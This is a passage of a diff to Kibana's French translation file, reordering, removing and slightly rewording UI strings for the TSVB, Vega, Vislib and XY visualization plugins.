"visTypeTimeseries.timeseries.annotationsTab.annotationsButtonLabel": "Annotations", "visTypeTimeseries.timeSeries.axisMaxLabel": "Max. de l'axe", 
@@ -6725,20 +5897,20 @@ "visTypeTimeseries.timeseries.optionsTab.axisMinLabel": "Min. de l'axe", "visTypeTimeseries.timeseries.optionsTab.axisPositionLabel": "Position de l'axe", "visTypeTimeseries.timeseries.optionsTab.axisScaleLabel": "Échelle de l'axe", - "visTypeTimeseries.timeseries.optionsTab.backgroundColorLabel": "Couleur de l'arrière-plan :", + "visTypeTimeseries.timeseries.optionsTab.backgroundColorLabel": "Couleur de l'arrière-plan :", "visTypeTimeseries.timeseries.optionsTab.dataLabel": "Données", "visTypeTimeseries.timeseries.optionsTab.displayGridLabel": "Afficher la grille", - "visTypeTimeseries.timeseries.optionsTab.ignoreDaylightTimeLabel": "Ignorer l'heure d'été ?", - "visTypeTimeseries.timeseries.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", + "visTypeTimeseries.timeseries.optionsTab.ignoreDaylightTimeLabel": "Ignorer l'heure d'été ?", + "visTypeTimeseries.timeseries.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", "visTypeTimeseries.timeseries.optionsTab.legendPositionLabel": "Position de la légende", "visTypeTimeseries.timeseries.optionsTab.maxLinesLabel": "Nombre maxi de lignes de légende", "visTypeTimeseries.timeseries.optionsTab.panelFilterLabel": "Filtre de panneau", "visTypeTimeseries.timeseries.optionsTab.panelOptionsButtonLabel": "Options du panneau", - "visTypeTimeseries.timeseries.optionsTab.showLegendLabel": "Afficher la légende ?", + "visTypeTimeseries.timeseries.optionsTab.showLegendLabel": "Afficher la légende ?", "visTypeTimeseries.timeseries.optionsTab.styleLabel": "Style", "visTypeTimeseries.timeseries.optionsTab.tooltipMode": "Infobulle", - "visTypeTimeseries.timeseries.optionsTab.truncateLegendLabel": "Tronquer la légende ?", - "visTypeTimeseries.timeSeries.overrideDataViewLabel": "Écraser la vue de données ?", + "visTypeTimeseries.timeseries.optionsTab.truncateLegendLabel": "Tronquer la légende ?", + "visTypeTimeseries.timeSeries.overrideDataViewLabel": "Écraser la vue de données ?", 
"visTypeTimeseries.timeSeries.percentLabel": "Pourcent", "visTypeTimeseries.timeseries.positionOptions.leftLabel": "Gauche", "visTypeTimeseries.timeseries.positionOptions.rightLabel": "Droite", @@ -6746,13 +5918,12 @@ "visTypeTimeseries.timeSeries.rightLabel": "Droite", "visTypeTimeseries.timeseries.scaleOptions.logLabel": "Logarithmique", "visTypeTimeseries.timeseries.scaleOptions.normalLabel": "Normal", - "visTypeTimeseries.timeSeries.separateAxisLabel": "Axe séparé ?", + "visTypeTimeseries.timeSeries.separateAxisLabel": "Axe séparé ?", "visTypeTimeseries.timeSeries.splitColorThemeLabel": "Thème de couleurs de division", "visTypeTimeseries.timeSeries.stackedLabel": "Empilé", "visTypeTimeseries.timeSeries.stackedWithinSeriesLabel": "Empilé dans la série", "visTypeTimeseries.timeSeries.tab.metricsLabel": "Indicateurs", "visTypeTimeseries.timeSeries.tab.optionsLabel": "Options", - "visTypeTimeseries.timeSeries.templateHelpText": "par ex. {templateExample}", "visTypeTimeseries.timeSeries.templateLabel": "Modèle", "visTypeTimeseries.timeSeries.toggleSeriesEditorAriaLabel": "Basculer l'éditeur de séries", "visTypeTimeseries.timeseries.tooltipOptions.showAll": "Afficher toutes les valeurs", 
@@ -6777,11 +5948,10 @@ "visTypeTimeseries.topN.dataTab.dataButtonLabel": "Données", "visTypeTimeseries.topN.deleteSeriesTooltip": "Supprimer la série", "visTypeTimeseries.topN.labelPlaceholder": "Étiquette", - "visTypeTimeseries.topN.optionsTab.backgroundColorLabel": "Couleur de l'arrière-plan :", + "visTypeTimeseries.topN.optionsTab.backgroundColorLabel": "Couleur de l'arrière-plan :", "visTypeTimeseries.topN.optionsTab.colorRulesLabel": "Règles de couleur", "visTypeTimeseries.topN.optionsTab.dataLabel": "Données", - "visTypeTimeseries.topN.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", - "visTypeTimeseries.topN.optionsTab.itemUrlDescription": "Prend en charge les modèles de moustaches. {key} est défini sur le terme.", + "visTypeTimeseries.topN.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", "visTypeTimeseries.topN.optionsTab.itemUrlLabel": "URL de l'élément", "visTypeTimeseries.topN.optionsTab.panelFilterLabel": "Filtre de panneau", "visTypeTimeseries.topN.optionsTab.panelOptionsButtonLabel": "Options du panneau", @@ -6795,7 +5965,6 @@ "visTypeTimeseries.units.perMillisecond": "par milliseconde", "visTypeTimeseries.units.perMinute": "par minute", "visTypeTimeseries.units.perSecond": "par seconde", - "visTypeTimeseries.unsupportedSplit.splitIsUnsupportedDescription": "Diviser par {modelType} n'est pas pris en charge.", "visTypeTimeseries.vars.variableNameAriaLabel": "Nom de la variable", "visTypeTimeseries.vars.variableNamePlaceholder": "Nom de la variable", "visTypeTimeseries.visEditorVisualization.applyChangesLabel": "Appliquer les modifications", 
@@ -6805,77 +5974,50 @@ "visTypeTimeseries.visEditorVisualization.changesWillBeAutomaticallyAppliedMessage": "Les modifications seront appliquées automatiquement.", "visTypeTimeseries.visEditorVisualization.dataViewMode.dismissNoticeButtonText": "Rejeter", "visTypeTimeseries.visEditorVisualization.dataViewMode.link": "Venez voir.", - "visTypeTimeseries.visEditorVisualization.dataViewMode.notificationMessage": "Bonne nouvelle ! Vous pouvez visualiser les données des vues de données Kibana (recommandé) ou des index Elasticsearch. {indexPatternModeLink}.", "visTypeTimeseries.visEditorVisualization.dataViewMode.notificationTitle": "TSVB est compatible avec les vues de données", "visTypeTimeseries.visPicker.gaugeLabel": "Jauge", "visTypeTimeseries.visPicker.metricLabel": "Indicateur", "visTypeTimeseries.visPicker.tableLabel": "Tableau", "visTypeTimeseries.visPicker.timeSeriesLabel": "Séries temporelles", "visTypeTimeseries.visPicker.topNLabel": "N premiers", - "visTypeTimeseries.wrongAggregationErrorMessage": "l'agrégation {metricType} n’est pas compatible pour la configuration de panneau existante.", "visTypeTimeseries.yesButtonLabel": "Oui", - "visTypeVega.deprecatedHistogramIntervalInfo.message": "Le champ combiné \"interval\" a été déclassé à la faveur de deux nouveaux champs explicites : \"calendar_interval\" et \"fixed_interval\". 
{dateHistogramDoc}", - "visTypeVega.editor.formatError": "Erreur lors du formatage des spécifications", - "visTypeVega.editor.reformatAsHJSONButtonLabel": "Reformater en HJSON", - "visTypeVega.editor.reformatAsJSONButtonLabel": "Reformater en JSON, supprimer les commentaires", - "visTypeVega.editor.vegaDocumentationLinkText": "Documentation Vega", - "visTypeVega.editor.vegaEditorOptionsButtonAriaLabel": "Options de l'éditeur Vega", - "visTypeVega.editor.vegaHelpButtonAriaLabel": "Aide Vega", - "visTypeVega.editor.vegaHelpLinkText": "Aide Kibana Vega", - "visTypeVega.editor.vegaLiteDocumentationLinkText": "Documentation Vega-Lite", + "visTypeVega.deprecatedHistogramIntervalInfo.message": "Le champ combiné \"interval\" a été déclassé à la faveur de deux nouveaux champs explicites : \"calendar_interval\" et \"fixed_interval\". {dateHistogramDoc}", "visTypeVega.emsFileParser.emsFileNameDoesNotExistErrorMessage": "{emsfile} {emsfileName} n'existe pas", "visTypeVega.emsFileParser.missingNameOfFileErrorMessage": "{dataUrlParam} avec {dataUrlParamValue} requiert le paramètre {nameParam} (nom du fichier)", "visTypeVega.esQueryParser.autointervalValueTypeErrorMessage": "{autointerval} doit être {trueValue} ou un nombre", "visTypeVega.esQueryParser.dataUrlMustNotHaveLegacyAndBodyQueryValuesAtTheSameTimeErrorMessage": "{dataUrlParam} ne doit pas avoir de {legacyContext} existant et de valeurs {bodyQueryConfigName} en même temps", "visTypeVega.esQueryParser.dataUrlMustNotHaveLegacyContextTogetherWithContextOrTimefieldErrorMessage": "{dataUrlParam} ne doit pas avoir de {legacyContext} avec {context} ou {timefield}", "visTypeVega.esQueryParser.legacyContextCanBeTrueErrorMessage": "{legacyContext} existant peut être {trueValue} (ignore le sélecteur de plage temporelle), ou il peut s'agir du nom du champ temporel, par ex. 
{timestampParam}", - "visTypeVega.esQueryParser.legacyUrlShouldChangeToWarningMessage": "{urlParam} existant : {legacyUrl} doit être modifié en {result}", + "visTypeVega.esQueryParser.legacyUrlShouldChangeToWarningMessage": "{urlParam} existant : {legacyUrl} doit être modifié en {result}", "visTypeVega.esQueryParser.shiftMustValueTypeErrorMessage": "{shiftParam} doit être une valeur numérique", "visTypeVega.esQueryParser.timefilterValueErrorMessage": "La propriété {timefilter} doit être définie sur {trueValue}, {minValue} ou {maxValue}", - "visTypeVega.esQueryParser.unknownUnitValueErrorMessage": "Valeur {unitParamName} inconnue. Doit être l'une des valeurs suivantes : [{unitParamValues}]", + "visTypeVega.esQueryParser.unknownUnitValueErrorMessage": "Valeur {unitParamName} inconnue. Doit être l'une des valeurs suivantes : [{unitParamValues}]", "visTypeVega.esQueryParser.unnamedRequest": "Requête sans nom #{index}", "visTypeVega.esQueryParser.urlBodyValueTypeErrorMessage": "{configName} doit être un objet", "visTypeVega.esQueryParser.urlContextAndUrlTimefieldMustNotBeUsedErrorMessage": "{urlContext} et {timefield} ne doivent pas être utilisés lorsque {queryParam} est défini", - "visTypeVega.function.help": "Visualisation Vega", - "visTypeVega.inspector.dataSetsLabel": "Ensembles de données", - "visTypeVega.inspector.dataViewer.dataSetAriaLabel": "Ensemble de données", "visTypeVega.inspector.dataViewer.gridAriaLabel": "Grille de données {name}", - "visTypeVega.inspector.errorHeading": "Vega n’a pas réussi le rendu", - "visTypeVega.inspector.signalValuesLabel": "Valeurs de signal", - "visTypeVega.inspector.signalViewer.gridAriaLabel": "Grille de données des valeurs de signal", - "visTypeVega.inspector.specLabel": "Spéc.", - "visTypeVega.inspector.specViewer.copyToClipboardLabel": "Copier dans le presse-papiers", - "visTypeVega.inspector.vegaAdapter.signal": "Signal", - "visTypeVega.inspector.vegaAdapter.value": "Valeur", - "visTypeVega.inspector.vegaDebugLabel": 
"Débogage Vega", - "visTypeVega.mapView.experimentalMapLayerInfo": "Cette fonctionnalité est en version d'évaluation technique et peut être modifiée ou retirée complètement dans une future version. Elastic s'efforcera au maximum de corriger tout problème, mais les fonctionnalités dans la version d'évaluation technique ne sont pas soumises aux accords de niveau de service d'assistance des fonctionnalités officielles en disponibilité générale. Pour apporter des commentaires, veuillez créer une entrée dans {githubLink}.", + "visTypeVega.mapView.experimentalMapLayerInfo": "Cette fonctionnalité est en version d'évaluation technique et pourra être modifiée ou retirée complètement dans une future version. Elastic s'efforcera au maximum de corriger tout problème, mais les fonctionnalités dans la version d'évaluation technique ne sont pas soumises aux accords de niveau de service d'assistance des fonctionnalités officielles en disponibilité générale. Pour apporter des commentaires, veuillez créer une entrée dans {githubLink}.", "visTypeVega.mapView.mapStyleNotFoundWarningMessage": "{mapStyleParam} est introuvable", "visTypeVega.mapView.minZoomAndMaxZoomHaveBeenSwappedWarningMessage": "{minZoomPropertyName} et {maxZoomPropertyName} ont été permutés", "visTypeVega.mapView.resettingPropertyToMaxValueWarningMessage": "Réinitialisation de {name} sur {max}", "visTypeVega.mapView.resettingPropertyToMinValueWarningMessage": "Réinitialisation de {name} sur {min}", - "visTypeVega.type.vegaDescription": "Utilisez Vega pour créer de nouveaux types de visualisations.", - "visTypeVega.type.vegaNote": "Requiert une connaissance de la syntaxe Vega.", - "visTypeVega.type.vegaTitleInWizard": "Visualisation personnalisée", "visTypeVega.urlParser.dataUrlRequiresUrlParameterInFormErrorMessage": "{dataUrlParam} requiert un paramètre {urlParam} sous la forme \"{formLink}\"", "visTypeVega.urlParser.urlShouldHaveQuerySubObjectWarningMessage": "L'utilisation d'un {urlObject} requiert un sous-objet 
{subObjectName}", - "visTypeVega.vegaParser.autoSizeDoesNotAllowFalse": "{autoSizeParam} est activé ; il peut uniquement être désactivé en définissant {autoSizeParam} sur {noneParam}", + "visTypeVega.vegaParser.autoSizeDoesNotAllowFalse": "{autoSizeParam} est activé ; il peut uniquement être désactivé en définissant {autoSizeParam} sur {noneParam}", "visTypeVega.vegaParser.baseView.externalUrlsAreNotEnabledErrorMessage": "Les URL externes ne sont pas activées. Ajouter {enableExternalUrls} à {kibanaConfigFileName}", "visTypeVega.vegaParser.baseView.externalUrlServiceErrorMessage": "l'URL externe [{uri}] a été refusée par le service ExternalUrl. Vous pouvez configurer des politiques d'URL externe avec le paramètre \"{externalUrlPolicy}\" dans {kibanaConfigFileName}.", "visTypeVega.vegaParser.baseView.functionIsNotDefinedForGraphErrorMessage": "{funcName} n'est pas défini pour ce graphe", "visTypeVega.vegaParser.baseView.indexNotFoundErrorMessage": "Impossible de trouver l'index {index}", - "visTypeVega.vegaParser.baseView.timeValuesTypeErrorMessage": "Erreur lors de la définition du filtre de temps : les deux valeurs temporelles doivent être des dates relatives ou absolues. {start}, {end}", - "visTypeVega.vegaParser.baseView.unableToFindDefaultIndexErrorMessage": "Impossible de trouver l'index par défaut", + "visTypeVega.vegaParser.baseView.timeValuesTypeErrorMessage": "Erreur lors de la définition du filtre de temps : les deux valeurs temporelles doivent être des dates relatives ou absolues. {start}, {end}", "visTypeVega.vegaParser.centerOnMarkConfigValueTypeErrorMessage": "Les valeurs attendues pour {configName} sont {trueValue}, {falseValue} ou un nombre", "visTypeVega.vegaParser.dataExceedsSomeParamsUseTimesLimitErrorMessage": "Les données ne doivent pas avoir plus d'un paramètre {urlParam}, {valuesParam} et {sourceParam}", "visTypeVega.vegaParser.hostConfigIsDeprecatedWarningMessage": "{deprecatedConfigName} a été déclassé. 
Utilisez {newConfigName} à la place.", "visTypeVega.vegaParser.hostConfigValueTypeErrorMessage": "S'il est présent, le paramètre {configName} doit être un objet", "visTypeVega.vegaParser.inputSpecDoesNotSpecifySchemaErrorMessage": "Vos spécifications requièrent un champ {schemaParam} avec une URL valide pour\nVega (voir {vegaSchemaUrl}) ou\nVega-Lite (voir {vegaLiteSchemaUrl}).\nL'URL est uniquement un identificateur. Kibana et votre navigateur n'accéderont jamais à cette URL.", - "visTypeVega.vegaParser.invalidVegaSpecErrorMessage": "Spécification Vega non valide", "visTypeVega.vegaParser.kibanaConfigValueTypeErrorMessage": "S'il est présent, le paramètre {configName} doit être un objet", "visTypeVega.vegaParser.maxBoundsValueTypeWarningMessage": "{maxBoundsConfigName} doit être un tableau avec quatre nombres", "visTypeVega.vegaParser.notSupportedUrlTypeErrorMessage": "{urlObject} n'est pas pris en charge", - "visTypeVega.vegaParser.notValidLibraryVersionForInputSpecWarningMessage": "Les spécifications d'entrée utilisent {schemaLibrary} {schemaVersion}, mais la version actuelle de {schemaLibrary} est {libraryVersion}.", - "visTypeVega.vegaParser.notValidSchemaForInputSpec": "l'URL du \"$schema\" JSON est incorrecte. Corrigez l'URL, puis cliquez sur Mettre à jour.", + "visTypeVega.vegaParser.notValidLibraryVersionForInputSpecWarningMessage": "Les spécifications d'entrée utilisent {schemaLibrary} {schemaVersion}, mais la version actuelle de {schemaLibrary} est {libraryVersion}.", "visTypeVega.vegaParser.paddingConfigValueTypeErrorMessage": "La valeur attendue pour {configName} est un nombre", "visTypeVega.vegaParser.someKibanaConfigurationIsNoValidWarningMessage": "{configName} n'est pas valide", "visTypeVega.vegaParser.someKibanaParamValueTypeWarningMessage": "{configName} doit être une valeur booléenne", 
@@ -6883,33 +6025,59 @@ "visTypeVega.vegaParser.unexpectedValueForPositionConfigurationErrorMessage": "Valeur inattendue pour la configuration {configurationName}", "visTypeVega.vegaParser.unrecognizedControlsLocationValueErrorMessage": "Valeur {controlsLocationParam} non reconnue. Valeur attendue parmi [{locToDirMap}]", "visTypeVega.vegaParser.unrecognizedDirValueErrorMessage": "Valeur {dirParam} non reconnue. Valeur attendue parmi [{expectedValues}]", - "visTypeVega.vegaParser.VLCompilerShouldHaveGeneratedSingleProtectionObjectErrorMessage": "Erreur interne : le compilateur Vega-Lite aurait dû générer un objet de projection unique", "visTypeVega.vegaParser.widthAndHeightParamsAreIgnored": "Les paramètres {widthParam} et {heightParam} sont ignorés, car {autoSizeParam} est activé. Pour le désactiver, définissez {autoSizeParam} sur {noneParam}", "visTypeVega.vegaParser.widthAndHeightParamsAreRequired": "Aucun rendu n'est généré lorsque {autoSizeParam} est défini sur {noneParam} quand les spécifications {vegaLiteParam} à facette ou répétées sont utilisées. 
Pour y remédier, retirez {autoSizeParam} ou utilisez {vegaParam}.", + "visTypeVega.editor.formatError": "Erreur lors du formatage des spécifications", + "visTypeVega.editor.reformatAsHJSONButtonLabel": "Reformater en HJSON", + "visTypeVega.editor.reformatAsJSONButtonLabel": "Reformater en JSON, supprimer les commentaires", + "visTypeVega.editor.vegaDocumentationLinkText": "Documentation Vega", + "visTypeVega.editor.vegaEditorOptionsButtonAriaLabel": "Options de l'éditeur Vega", + "visTypeVega.editor.vegaHelpButtonAriaLabel": "Aide Vega", + "visTypeVega.editor.vegaHelpLinkText": "Aide Kibana Vega", + "visTypeVega.editor.vegaLiteDocumentationLinkText": "Documentation Vega-Lite", + "visTypeVega.function.help": "Visualisation Vega", + "visTypeVega.inspector.dataSetsLabel": "Ensembles de données", + "visTypeVega.inspector.dataViewer.dataSetAriaLabel": "Ensemble de données", + "visTypeVega.inspector.errorHeading": "Vega n’a pas réussi le rendu", + "visTypeVega.inspector.signalValuesLabel": "Valeurs de signal", + "visTypeVega.inspector.signalViewer.gridAriaLabel": "Grille de données des valeurs de signal", + "visTypeVega.inspector.specLabel": "Spéc.", + "visTypeVega.inspector.specViewer.copyToClipboardLabel": "Copier dans le presse-papiers", + "visTypeVega.inspector.vegaAdapter.signal": "Signal", + "visTypeVega.inspector.vegaAdapter.value": "Valeur", + "visTypeVega.inspector.vegaDebugLabel": "Débogage Vega", + "visTypeVega.type.vegaDescription": "Utilisez Vega pour créer de nouveaux types de visualisations.", + "visTypeVega.type.vegaNote": "Requiert une connaissance de la syntaxe Vega.", + "visTypeVega.type.vegaTitleInWizard": "Visualisation personnalisée", + "visTypeVega.vegaParser.baseView.unableToFindDefaultIndexErrorMessage": "Impossible de trouver l'index par défaut", + "visTypeVega.vegaParser.invalidVegaSpecErrorMessage": "Spécification Vega non valide", + "visTypeVega.vegaParser.notValidSchemaForInputSpec": "l'URL du \"$schema\" JSON est incorrecte. 
Corrigez l'URL, puis cliquez sur Mettre à jour.", + "visTypeVega.vegaParser.VLCompilerShouldHaveGeneratedSingleProtectionObjectErrorMessage": "Erreur interne : le compilateur Vega-Lite aurait dû générer un objet de projection unique", "visTypeVega.visualization.renderErrorTitle": "Erreur Vega", "visTypeVega.visualization.setMapViewErrorMessage": "Paramètres setMapView() inattendus. Il est possible de l'appeler avec une zone de délimitation setMapView([[longitude1,latitude1],[longitude2,latitude2]]), ou il peut s'agir du point central setMapView([longitude, latitude], optional_zoom), ou encore il est possible de l'utiliser comme setMapView(latitude, longitude, optional_zoom)", "visTypeVega.visualization.unableToRenderWithoutDataWarningMessage": "Impossible de générer un rendu sans données", + "visTypeVislib.vislib.heatmap.maxBucketsText": "Trop de séries sont définies ({nr}). La valeur de configuration maximale est {max}.", + "visTypeVislib.vislib.legend.filterForValueButtonAriaLabel": "Filtrer pour la valeur {legendDataLabel}", + "visTypeVislib.vislib.legend.filterOptionsLegend": "{legendDataLabel}, options de filtre", + "visTypeVislib.vislib.legend.filterOutValueButtonAriaLabel": "Filtrer la valeur {legendDataLabel}", + "visTypeVislib.vislib.legend.toggleOptionsButtonAriaLabel": "{legendDataLabel}, options de basculement", "visTypeVislib.advancedSettings.visualization.heatmap.maxBucketsText": "Nombre maximal de groupes pouvant être renvoyés par une source de données unique. 
Un nombre plus élevé pourra impacter négativement les performances de rendu du navigateur", "visTypeVislib.advancedSettings.visualization.heatmap.maxBucketsTitle": "Nombre maximal de groupes pour la carte thermique", "visTypeVislib.aggResponse.allDocsTitle": "Tous les docs", "visTypeVislib.functions.pie.help": "Visualisation du camembert", "visTypeVislib.functions.vislib.help": "Visualisation Vislib", "visTypeVislib.vislib.errors.noResultsFoundTitle": "Résultat introuvable", - "visTypeVislib.vislib.heatmap.maxBucketsText": "Trop de séries sont définies ({nr}). La valeur de configuration maximale est {max}.", - "visTypeVislib.vislib.legend.filterForValueButtonAriaLabel": "Filtrer pour la valeur {legendDataLabel}", - "visTypeVislib.vislib.legend.filterOptionsLegend": "{legendDataLabel}, options de filtre", - "visTypeVislib.vislib.legend.filterOutValueButtonAriaLabel": "Filtrer la valeur {legendDataLabel}", "visTypeVislib.vislib.legend.loadingLabel": "chargement…", "visTypeVislib.vislib.legend.toggleLegendButtonAriaLabel": "Basculer la légende", - "visTypeVislib.vislib.legend.toggleLegendButtonTitle": "Basculer la légende", - "visTypeVislib.vislib.legend.toggleOptionsButtonAriaLabel": "{legendDataLabel}, options de basculement", + "visTypeVislib.vislib.legend.toggleLegendButtonTitle": "Afficher/Masquer la légende", "visTypeVislib.vislib.tooltip.fieldLabel": "champ", "visTypeVislib.vislib.tooltip.valueLabel": "valeur", - "visTypeXy.aggResponse.allDocsTitle": "Tous les docs", + "visTypeXy.controls.pointSeries.seriesAccordionAriaLabel": "Basculer les options {agg}", + "visTypeXy.controls.pointSeries.valueAxes.toggleOptionsAriaLabel": "Basculer les options {axisName}", "visTypeXy.area.areaDescription": "Mettez en avant les données entre un axe et une ligne.", "visTypeXy.area.areaTitle": "Aire", "visTypeXy.area.groupTitle": "Diviser la série", - "visTypeXy.area.metricsTitle": "Axe Y", + "visTypeXy.area.metricsTitle": "Axe Y", "visTypeXy.area.radiusTitle": "Taille du 
point", "visTypeXy.area.segmentTitle": "Axe X", "visTypeXy.area.splitTitle": "Diviser le graphique", @@ -6937,7 +6105,7 @@ "visTypeXy.controls.pointSeries.categoryAxis.xAxisTitle": "Axe X", "visTypeXy.controls.pointSeries.gridAxis.dontShowLabel": "Ne pas afficher", "visTypeXy.controls.pointSeries.gridAxis.gridText": "Grille", - "visTypeXy.controls.pointSeries.gridAxis.xAxisLinesLabel": "Afficher les lignes de l'axe X", + "visTypeXy.controls.pointSeries.gridAxis.xAxisLinesLabel": "Afficher les lignes de l'axe X", "visTypeXy.controls.pointSeries.gridAxis.yAxisLinesLabel": "Lignes de l'axe Y", "visTypeXy.controls.pointSeries.series.chartTypeLabel": "Type de graphique", "visTypeXy.controls.pointSeries.series.circlesRadius": "Taille des points", 
@@ -6949,25 +6117,23 @@ "visTypeXy.controls.pointSeries.series.showDotsLabel": "Afficher les points", "visTypeXy.controls.pointSeries.series.showLineLabel": "Afficher la ligne", "visTypeXy.controls.pointSeries.series.valueAxisLabel": "Axe des valeurs", - "visTypeXy.controls.pointSeries.seriesAccordionAriaLabel": "Basculer les options {agg}", "visTypeXy.controls.pointSeries.valueAxes.addButtonTooltip": "Ajouter l'axe Y", "visTypeXy.controls.pointSeries.valueAxes.customExtentsLabel": "Extensions personnalisées", "visTypeXy.controls.pointSeries.valueAxes.maxLabel": "Max", "visTypeXy.controls.pointSeries.valueAxes.minErrorMessage": "Min doit être inférieur à Max.", "visTypeXy.controls.pointSeries.valueAxes.minLabel": "Min", - "visTypeXy.controls.pointSeries.valueAxes.minNeededScaleText": "Min doit être supérieur à 0 lorsqu'une échelle logarithmique est sélectionnée.", + "visTypeXy.controls.pointSeries.valueAxes.minNeededScaleText": "Min doit être supérieur à 0 lorsqu'une échelle logarithmique est sélectionnée.", "visTypeXy.controls.pointSeries.valueAxes.modeLabel": "Mode", "visTypeXy.controls.pointSeries.valueAxes.positionLabel": "Position", "visTypeXy.controls.pointSeries.valueAxes.removeButtonTooltip": "Retirer l'axe Y", "visTypeXy.controls.pointSeries.valueAxes.scaleToDataBounds.boundsMargin": "Marge des limites", - "visTypeXy.controls.pointSeries.valueAxes.scaleToDataBounds.minNeededBoundsMargin": "La marge des limites doit être supérieure ou égale à 0.", + "visTypeXy.controls.pointSeries.valueAxes.scaleToDataBounds.minNeededBoundsMargin": "La marge des limites doit être supérieure ou égale à 0.", "visTypeXy.controls.pointSeries.valueAxes.scaleToDataBoundsLabel": "Scaler sur les limites de données", "visTypeXy.controls.pointSeries.valueAxes.scaleTypeLabel": "Type d'échelle", "visTypeXy.controls.pointSeries.valueAxes.setAxisExtentsLabel": "Définir la portée de l'axe", "visTypeXy.controls.pointSeries.valueAxes.showLabel": "Afficher les lignes et étiquettes de l'axe", 
"visTypeXy.controls.pointSeries.valueAxes.titleLabel": "Titre", "visTypeXy.controls.pointSeries.valueAxes.toggleCustomExtendsAriaLabel": "Basculer la portée personnalisée", - "visTypeXy.controls.pointSeries.valueAxes.toggleOptionsAriaLabel": "Basculer les options {axisName}", "visTypeXy.controls.pointSeries.valueAxes.yAxisTitle": "Axes Y", "visTypeXy.controls.truncateLabel": "Tronquer", "visTypeXy.editors.elasticChartsOptions.detailedTooltip.label": "Afficher l'infobulle détaillée", 
@@ -6989,113 +6155,23 @@ "visTypeXy.fittingFunctionsTitle.lookahead": "Suivante (remplit les blancs avec la valeur suivante)", "visTypeXy.fittingFunctionsTitle.none": "Masquer (ne remplit pas les blancs)", "visTypeXy.fittingFunctionsTitle.zero": "Zéro (remplit les blancs avec des zéros)", - "visTypeXy.function.adimension.bucket": "Groupe", - "visTypeXy.function.adimension.dotSize": "Taille du point", - "visTypeXy.function.args.addLegend.help": "Afficher la légende du graphique", - "visTypeXy.function.args.addTimeMarker.help": "Afficher le repère de temps", - "visTypeXy.function.args.addTooltip.help": "Afficher l'infobulle au survol", - "visTypeXy.function.args.args.chartType.help": "Type de graphique. Peut être linéaire, en aires ou histogramme", - "visTypeXy.function.args.args.legendSize.help": "Spécifie la taille de la légende.", - "visTypeXy.function.args.args.maxLegendLines.help": "Définit le nombre maximum de lignes par élément de légende", - "visTypeXy.function.args.ariaLabel.help": "Spécifie l'attribut aria-label du graphique xy", - "visTypeXy.function.args.categoryAxes.help": "Configuration de l'axe de catégorie", - "visTypeXy.function.args.detailedTooltip.help": "Afficher l'infobulle détaillée", - "visTypeXy.function.args.fillOpacity.help": "Définit l'opacité du remplissage du graphique en aires", - "visTypeXy.function.args.fittingFunction.help": "Nom de la fonction d'adaptation", - "visTypeXy.function.args.gridCategoryLines.help": "Afficher les lignes de catégories de la grille dans le graphique", - "visTypeXy.function.args.gridValueAxis.help": "Nom de l'axe des valeurs pour lequel la grille est affichée", - "visTypeXy.function.args.isVislibVis.help": "Indicateur des anciennes visualisations vislib. 
Utilisé pour la rétro-compatibilité, notamment pour les couleurs", - "visTypeXy.function.args.labels.help": "Configuration des étiquettes du graphique", - "visTypeXy.function.args.legendPosition.help": "Positionner la légende en haut, en bas, à gauche ou à droite du graphique", - "visTypeXy.function.args.orderBucketsBySum.help": "Classer les groupes par somme", - "visTypeXy.function.args.palette.help": "Définit le nom de la palette du graphique", - "visTypeXy.function.args.radiusRatio.help": "Rapport de taille des points", - "visTypeXy.function.args.seriesDimension.help": "Configuration de la dimension de la série", - "visTypeXy.function.args.seriesParams.help": "Configuration des paramètres de la série", - "visTypeXy.function.args.splitColumnDimension.help": "Configuration de la dimension Diviser par colonne", - "visTypeXy.function.args.splitRowDimension.help": "Configuration de la dimension Diviser par ligne", - "visTypeXy.function.args.thresholdLine.help": "Configuration de la ligne de seuil", - "visTypeXy.function.args.times.help": "Configuration du repère de temps", - "visTypeXy.function.args.truncateLegend.help": "Détermine si la légende sera tronquée ou non", - "visTypeXy.function.args.valueAxes.help": "Configuration de l'axe des valeurs", - "visTypeXy.function.args.widthDimension.help": "Configuration de la dimension en largeur", - "visTypeXy.function.args.xDimension.help": "Configuration de la dimension de l'axe X", - "visTypeXy.function.args.yDimension.help": "Configuration de la dimension de l'axe Y", - "visTypeXy.function.args.zDimension.help": "Configuration de la dimension de l'axe Z", - "visTypeXy.function.categoryAxis.help": "Génère l'objet axe de catégorie", - "visTypeXy.function.categoryAxis.id.help": "ID de l'axe de catégorie", - "visTypeXy.function.categoryAxis.labels.help": "Configuration de l'étiquette de l'axe", - "visTypeXy.function.categoryAxis.position.help": "Position de l'axe de catégorie", - "visTypeXy.function.categoryAxis.scale.help": 
"Configuration de l'échelle", - "visTypeXy.function.categoryAxis.show.help": "Afficher l'axe de catégorie", - "visTypeXy.function.categoryAxis.title.help": "Titre de l'axe de catégorie", - "visTypeXy.function.categoryAxis.type.help": "Type de l'axe de catégorie. Peut être une catégorie ou une valeur", - "visTypeXy.function.dimension.metric": "Indicateur", - "visTypeXy.function.dimension.splitcolumn": "Division de colonne", - "visTypeXy.function.dimension.splitrow": "Division de ligne", - "visTypeXy.function.label.color.help": "Couleur de l'étiquette", - "visTypeXy.function.label.filter.help": "Masque les étiquettes qui se chevauchent et les éléments en double sur l'axe", - "visTypeXy.function.label.help": "Génère l'objet étiquette", - "visTypeXy.function.label.overwriteColor.help": "Écraser la couleur", - "visTypeXy.function.label.rotate.help": "Faire pivoter l'angle", - "visTypeXy.function.label.show.help": "Afficher l'étiquette", - "visTypeXy.function.label.truncate.help": "Nombre de symboles avant troncature", - "visTypeXy.function.scale.boundsMargin.help": "Marge des limites", - "visTypeXy.function.scale.defaultYExtents.help": "Indicateur qui permet de scaler sur les limites de données", - "visTypeXy.function.scale.help": "Génère l'objet échelle", - "visTypeXy.function.scale.max.help": "Valeur max", - "visTypeXy.function.scale.min.help": "Valeur min", - "visTypeXy.function.scale.mode.help": "Mode échelle. Peut être normal, pourcentage, ondulé ou silhouette", - "visTypeXy.function.scale.setYExtents.help": "Indicateur qui permet de définir votre propre portée", - "visTypeXy.function.scale.type.help": "Type d'échelle. 
